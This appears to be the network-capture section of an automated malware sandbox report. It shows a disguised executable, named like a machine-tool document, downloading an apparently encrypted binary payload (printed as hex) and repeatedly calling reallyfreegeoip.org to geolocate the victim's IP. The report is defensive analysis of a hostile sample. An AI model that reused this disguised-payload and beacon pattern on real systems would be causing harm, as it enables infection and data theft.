                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="mTCNLyZXNMlBC5.bin"
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Length: 274496
                                                                                                                                                                                                                        Last-Modified: Tue, 01 Oct 2024 23:17:15 GMT
                                                                                                                                                                                                                        X-GUploader-UploadID: AHmUCY0x-OmIpRQYBk7TKQQIRQ2QCq2C43TMPw_9akwq91bs73PAn8V9ghpTHJW25sdiZBaoaa0
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:12 GMT
                                                                                                                                                                                                                        Expires: Mon, 07 Oct 2024 08:56:12 GMT
                                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                                        X-Goog-Hash: crc32c=sWFznw==
                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC4891INData Raw: a9 6a 8a 33 d7 ed 7e c4 cd e1 41 be 40 ca 82 e7 04 03 0a fc b1 52 12 c3 0e 35 1a b4 ff 89 99 a6 d9 30 da 20 ae 39 d0 7f 2b c4 43 e0 99 1d bc b3 56 e7 41 c4 e4 59 e6 b7 38 35 66 ae d4 d6 f3 90 d3 38 6f 7f 90 b0 69 13 fa 31 95 37 f6 80 c2 9c 84 dc 22 f9 8f 4a 56 07 4b b9 fb 00 ad 49 90 5f 97 20 9f 28 08 65 c9 2b 26 69 9e 20 22 53 d0 2c 50 97 3e 91 53 6f 72 e2 8d 01 98 0a c8 16 80 87 28 7d 56 67 09 c7 2f d3 85 d6 4a 7b 4a 4a 38 7d 47 8e 25 72 a1 69 8b e5 11 c9 13 81 ae 37 1c aa ba a3 9b fe bd 76 e8 57 2f a3 6b 3e 1b 9c ca 80 b5 0a 24 ab 62 e2 59 0f 95 6b 8d c0 03 f3 67 05 af ff c5 d5 73 f1 47 d1 b3 38 8f 85 ce 7f 5b 6c d2 08 ed d6 3a 8e 5c f3 b6 14 05 43 f3 3a 8f 2c 21 23 93 f1 50 43 77 91 4c 8a f1 45 27 95 41 e6 19 71 8b fe 7a 7e c4 9b b6 3e b1 cf 3d 27 0c
                                                                                                                                                                                                                        Data Ascii: j3~A@R50 9+CVAY85f8oi17"JVKI_ (e+&i "S,P>Sor(}Vg/J{JJ8}G%ri7vW/k>$bYkgsG8[l:\C:,!#PCwLE'Aqz~>='
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC4891INData Raw: 58 be b6 71 7e 64 07 4b 06 f3 dc 83 61 c8 42 b7 32 db e0 98 a6 9e d8 58 46 53 8f 75 ba 6c fb 30 e7 a0 4b 39 b6 f3 f6 4c e7 b8 a8 17 f8 56 f5 b8 5a 05 9a 49 58 e9 1c 0a 7f 37 91 17 4a 57 3d 61 9e 53 41 dd 3f 6c 5d 92 2b 9f ab 10 48 cc ae 3d 38 7b 7a b6 40 15 6e 77 71 b7 a7 31 c1 91 31 bc 73 95 5f ca 77 ba fe 15 ca 34 fe df fc 45 b7 8d 37 6d 57 f2 5b 5d 2d 93 08 db 8a 62 27 22 f3 b6 ab 6a e7 94 7d 55 12 d6 1b 36 c7 96 80 23 0a 66 db c0 ad 8e 1c 9a 87 09 87 16 f7 6b 06 8c b9 23 39 a1 a8 e1 37 b9 c6 d8 ff 1d d9 b5 b2 2c 9e 44 e5 e3 f7 65 7e ac 08 a9 2e b2 db 33 49 c2 15 8c c4 a6 9c b7 ef 84 2c 18 d3 81 0c 9f d1 33 e9 f5 89 ea 82 9c 5d 65 64 79 f1 30 e8 79 1d 37 81 e7 74 5f 3f 18 a6 bb 49 b7 4a 63 a5 ab fd 11 67 84 5b 48 d9 47 4f 1a 65 e5 24 b3 9e d0 f5 65 ce
                                                                                                                                                                                                                        Data Ascii: Xq~dKaB2XFSul0K9LVZIX7JW=aSA?l]+H=8{z@nwq11s_w4E7mW[]-b'"j}U6#fk#97,De~.3I,3]edy0y7t_?IJcg[HGOe$e
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC27INData Raw: 94 6c 22 78 d0 2d b0 b1 b5 0f 8f be 9e ba 56 02 54 3c 55 81 1c 36 16 a7 25 b6 f1
                                                                                                                                                                                                                        Data Ascii: l"x-VT<U6%
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 34 3e 6e 93 e1 08 b7 57 2a 3c 3e 27 96 f4 10 ef 0f 3a 4c 1b 7d 84 c8 99 68 bb 1a 16 f8 29 4a 38 bf cf 59 e4 96 89 2f bd 5a 56 ed 28 88 1f 31 2f d7 13 a9 74 fd 45 4b 70 33 ce 37 50 e2 ee 21 95 87 08 27 a6 99 08 db 6c 94 c9 99 fe e8 39 5f ec 44 96 c1 62 58 fc a1 e0 33 3a 1c 79 6e de 53 32 5a f5 af 31 d4 1b 32 4f 30 5b 36 a5 fc b6 f7 46 ca 0b 4c 77 29 0b 8d 0c ac 83 6c 16 0d 60 b5 b6 16 28 20 31 1f 12 e5 5d db 98 6f 35 89 b2 0f 9b fa a7 4e 1c 9e 98 ff 4b 45 e9 07 47 2f 59 8a fd 6f 85 d3 a4 90 60 d1 15 13 bb e8 eb 00 22 ac f9 e4 49 10 eb 0c 02 5b 19 47 a5 8f 92 08 70 3c 14 48 45 ac fd 1e 7b 23 d9 bb 03 e8 75 a9 56 aa a6 eb 2b a6 28 72 ed a8 4f 7d b4 6a cb 48 8b d3 76 01 9f ea b4 80 82 be 77 1f 9d 5e a1 16 97 12 80 3d 9b 11 19 19 83 7e 4c b3 15 2f 58 e4 8c f9
                                                                                                                                                                                                                        Data Ascii: 4>nW*<>':L}h)J8Y/ZV(1/tEKp37P!'l9_DbX3:ynS2Z12O0[6FLw)l`( 1]o5NKEG/Yo`"I[Gp<HE{#uV+(rO}jHvw^=~L/X
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC66INData Raw: 5c 7b b6 40 b6 6f 77 71 ac a7 31 c1 59 30 bc 73 12 5f ca 77 16 fe 15 ca 01 ff df fc 57 b7 8d 37 ff 56 f2 5a 85 2c 93 08 48 8b 62 27 79 f2 b6 aa d0 d5 97 7d f4 12 d6 1b 60 c7 96 90 23 0a 4e b8 10 af
                                                                                                                                                                                                                        Data Ascii: \{@owq1Y0s_wW7VZ,Hb'y}`#N
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 84 17 db ae 53 87 00 f9 68 69 c0 b9 23 33 8b cc e1 36 b3 c6 df e0 72 51 ea b2 9c 9f 2b 80 cc f1 6f 7e bb 0f c6 48 f7 db 39 4f ad 72 8c c4 59 f5 df ef a2 26 14 d3 e9 62 9f d1 29 fa f1 89 be 86 94 4b 0d 3e 7d f1 e8 fa 7c 1d 06 84 94 0e 5f 4d 00 a6 bd 28 bb 3a 24 da ab 8d 10 4f 5e 55 48 ce 2e b4 12 74 e9 24 6a 9e d0 f5 0a cb 9e 97 35 7f 57 e5 ea a7 c1 1a a9 37 29 fb 02 9e 4f ff 16 38 45 fb e1 eb 00 50 4c 96 23 89 c9 63 ef 05 9b 42 0f 86 4b 81 77 dc 43 77 c2 a0 ff 83 c4 5e c4 fe c5 4a 27 be 2e b1 31 b4 e6 11 63 82 66 3d 73 94 6c 20 65 9b 3d b0 cb cc fb 3c be 94 a3 47 ee 52 07 84 90 10 05 66 a2 25 b6 f7 4f 1b 68 ae eb 67 6d 24 91 36 2d 2a ac 4f 38 31 05 3a 35 d5 a2 84 c2 80 76 ae 3f 6c c2 29 4c 53 17 71 59 ee f3 3a 90 bd 50 4f ea 2b 82 58 2c 2f d7 13 ff 4d fd
                                                                                                                                                                                                                        Data Ascii: Shi#36rQ+o~H9OrY&b)K>}|_M(:$O^UH.t$j5W7)O8EPL#cBKwCw^J'.1cf=sl e=<GRf%Ohgm$6-*O81:5v?l)LSqY:PO+X,/M
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 9d 1f ef ce 7f 73 1b d2 08 e7 d6 a4 a5 5e f2 b9 3d 9a 43 f3 2a 98 22 53 cb 83 f1 20 3d 5a 91 c2 b6 87 47 36 b5 31 f7 17 19 5f fe 7a 74 97 94 c4 0a a0 cf 4d 0d 5a f9 60 fb 4a 69 90 25 0c 85 c5 6e a3 87 a3 42 2d e1 d5 09 e8 a7 10 29 00 0e 4e 50 71 e9 05 25 60 d8 71 ad 8f c5 b1 e4 31 47 a0 f1 76 63 9e 72 b1 e0 94 37 30 f3 8b d5 cc 2d cc 3a 9a 19 b2 30 59 f3 ed 51 49 ac 59 61 7b 7b 07 cb 43 9f 82 a8 63 c2 42 78 2e b4 55 95 8a 9c c9 44 39 3d 5a 75 b0 66 34 fd e6 96 0c 74 b6 f3 f6 4c fa a9 92 06 5b 56 ff 6c 49 11 a1 5d 37 d3 50 0a 75 26 84 06 5e 62 98 61 9e 6e 40 cc 2d 92 f8 92 2b 9b ab 01 5b a3 78 3d 38 73 7a b6 78 71 6f 77 71 ac a7 27 e9 2f 30 bc 79 9b 7f ca 7b ba fe 3d bd 34 fe d5 fc 58 3a cd 37 ba 57 d7 4d f7 91 98 08 bb a2 23 27 67 f5 14 8f 66 a9 d2 7d e4
                                                                                                                                                                                                                        Data Ascii: s^=C*"S =ZG61_ztMZ`Ji%nB-)NPq%`q1Gvcr70-:0YQIYa{{CcBx.UD9=Zuf4tL[VlI]7Pu&^ban@-+[x=8szxqowq'/0y{=4X:7WM#'gf}
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 09 74 cd 20 4b c7 6c 35 c9 87 49 48 7e fa 24 11 48 ac 44 7d 64 4d 2d 19 ed 73 39 6f 86 36 26 53 f2 f2 29 69 26 54 8e 8a ed 57 b0 c8 c3 a0 37 2f c1 92 9f 20 d2 6d d4 33 22 c4 78 7b 21 a9 9f 0f b6 e0 e9 10 d9 2d c5 a0 ec f2 48 27 c6 03 23 3b 47 1f 36 cf c5 51 4d f0 e8 1c 19 5e af 47 5f c3 94 21 0b 6b 81 6a 8e 79 3e dd fb c4 e2 49 8f 5b 8d b2 85 47 19 e7 a7 77 e9 6f cc b2 24 d8 d1 25 d9 cc 27 9e 62 f5 7f 93 b8 06 a9 fe 31 9f 24 0d 6e c6 95 2a d5 ac 90 e0 14 56 07 01 b9 ea 04 c2 ed 90 5f 9d 20 ed 72 09 65 b9 ab 0f 69 9e 24 fc 5d d0 3d 54 bb 36 80 57 00 73 e2 8d 0b 98 d6 96 05 a5 af 12 62 ec 63 1a 76 26 36 c6 6e 4b 3d 5a 0c 6a 15 2e fd 05 02 ad 34 ec 97 74 d6 64 e0 cf 29 64 ed 7d 83 f9 91 8b fa 9c 2a 09 db 03 27 e2 d1 99 a0 a6 4a 40 ce 48 9d 65 07 b1 1b 9b e8
                                                                                                                                                                                                                        Data Ascii: t Kl5IH~$HD}dM-s9o6&S)i&TW7/ m3"x{!-H'#;G6QM^G_!kjy>I[Gwo$%'b1$n*V_ rei$]=T6Wsbcv&6nK=Zj.4td)d}*'J@He
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: ab bf 88 e0 37 44 a3 a3 c5 16 02 32 98 2b 70 fe bf 01 55 63 d0 8f ca 7d fb 77 0f a8 e6 62 dc 22 10 39 19 20 5c 72 b4 c7 49 8f 3d 80 2a 79 11 b4 49 e8 3f 8d a0 15 8d fa e4 2b 89 2d c8 63 25 a3 c1 bc b1 8d 1f c8 5a 4b 40 73 ea 61 42 1f 12 2e a6 f2 2a 14 1f 6e 33 00 5e cf 38 d9 42 a1 e6 7a 90 f7 35 7f ee 1e 92 6a 81 bd 3e 0b d0 1e f9 07 4b 62 a1 94 10 58 b4 87 20 70 6e 80 f1 c9 60 40 fa 38 3a 86 46 54 26 42 40 df 6e 32 9d 53 de e9 c6 4f 18 e2 d7 f3 9c 74 14 65 48 8b db bd 5a 7c be d5 f7 df 66 e4 ef 24 2c 91 75 60 0d 0f 82 ac 70 ad 94 c6 eb 7a 7e 1d 39 cc f2 61 f1 e0 95 96 95 0a 6a ce 79 de 44 03 2e 06 57 ee 30 60 24 8e 35 03 86 cd 33 00 c0 04 d3 4a e2 bf 3a 46 96 6a f0 e4 db 78 ce ee be d4 4c 31 c5 69 34 b5 39 2a b8 c1 7b 69 0e f0 f7 46 e0 9c 1a 18 24 bd 8e
                                                                                                                                                                                                                        Data Ascii: 7D2+pUc}wb"9 \rI=*yI?+-c%ZK@saB.*n3^8Bz5j>KbX pn`@8:FT&B@n2SOteHZ|f$,u`pz~9ajyD.W0`$53J:FjxL1i49*{iF$
                                                                                                                                                                                                                        2024-10-07 08:56:12 UTC1255INData Raw: 57 2f 73 eb f2 ab 76 5d 02 f4 73 12 64 90 6e 11 67 89 ad 9d a4 70 f0 8e 64 c9 17 40 b6 3f 0f c7 67 e5 6b eb 88 1b 95 03 d7 14 6e 20 a4 6d 78 88 d8 63 f0 4d d1 03 27 0d 22 2b a7 d6 e5 93 3d 9b a8 47 a3 ae e2 ba ec 93 60 5d 5f b9 0a f0 6a 84 a1 37 a9 f3 6a 07 b3 29 64 52 ce 13 c6 35 49 c4 61 51 a2 aa c4 23 18 f1 88 4b c9 c3 91 6f 58 16 a3 c1 25 94 d4 fc 06 de a1 00 02 2d 0b 9b 6a 34 41 6d 6d b5 57 bc 46 b6 15 60 e9 4d 1a 53 05 ea 96 48 f6 f1 04 8a c2 ca eb fe ba 82 04 eb 12 6f 7f 1e ca 61 d2 96 e7 b9 44 1b 34 b2 ae 3f ea a5 18 94 d0 9e 77 9a c6 ac 17 78 17 9d 0c c0 23 9a 14 5e 58 04 a0 fb 9a 55 7d 2d e9 c6 82 85 93 49 81 fa 47 4c 90 57 2e 86 f2 36 6f dd c5 dc b7 82 43 fc 96 fa b6 07 c4 60 30 a8 57 3f fc e4 c0 7d 0a f8 17 04 b4 99 13 91 31 fe 87 b7 03 59 40
                                                                                                                                                                                                                        Data Ascii: W/sv]sdngpd@?gkn mxcM'"+=G`]_j7j)dR5IaQ#KoX%-j4AmmWF`MSHoaD4?wx#^XU}-IGLW.6oC`0W?}1Y@


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.11.2049711172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:15 UTC87OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-10-07 08:56:15 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: MISS
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BmEEnSyLYlCV6kMJwzOgeMWMwz1KoYPFj3%2BPwRovlBUHKQBdiq0Q6lL6yn3Ca3f13LyRLlZYXPWavQjjlVe0TfzvJxh7GTuMNLaEOUrPYYny9Pv1V3qeLUidp3JnIiPu7IdfAXhM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad4848ed8cc3-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        2024-10-07 08:56:15 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.11.2049712172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:16 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:16 UTC684INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:16 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 1
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ls4ijhNiOOXRvsiA%2FQiRLeBqHwKkYZq0Qra1kkqs%2Fi%2F%2BhI0jT32eQX480JIampeEVQn2BDiNZ%2FVY1B9T1%2FiApTvuT%2FZevcUrXnHco1YMf%2BikIDCb3dU54n%2BP9Pa0ojrbgSmNKiAv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad4e9a9d4310-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:16 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.11.2049713172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:16 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC700INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:17 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 2
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ayF5K6NVTQe2n9qKSbcaHMhmhEv0ktvlg2vhSIYu7KY5sbvbPiNy6UKHCN%2FLoE5WQcolqjt8N8SPohtL9ToMF8nJQa8Rsq7g64XgVgmQwzMx%2B2CHj9J4xicEkorZUh3ho9xmmrP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad529b6742ca-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.11.2049714172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC672INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:17 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 2
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QWAUxpwK3TxFkXSsKc9Dc6%2FyyBsJJS5s3XnApZsr2oHJNZpwQHbqMLSAtKfEvCOKdTOCOp7Ki7YhiC3WFgtbXF6D7zOHwViTETc4s6gNs8mLfXob1EAIM%2Fx%2FKSqRkN097OOcQHpQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad56addf0cb0-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


